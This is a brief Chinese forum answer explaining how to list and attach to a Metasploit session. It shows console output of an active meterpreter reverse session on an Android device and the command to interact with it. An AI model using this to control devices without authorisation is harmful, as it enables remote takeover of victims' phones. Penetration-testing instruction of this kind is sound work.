2017-10-16 51 views

回答

0

ü可以尝试:sessions命令

msf exploit(handler) > sessions 

Active sessions 
=============== 

    Id Name Type      Information   Connection 
    -- ---- ----      -----------   ---------- 
    1   meterpreter dalvik/android u0_a280 @ localhost 192.168.43.216:4545 -> 192.168.43.1:47450 (192.168.43.1) 

您可以选择的ID号使用已经打开的会话。

msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1... 

meterpreter > help 
相关问题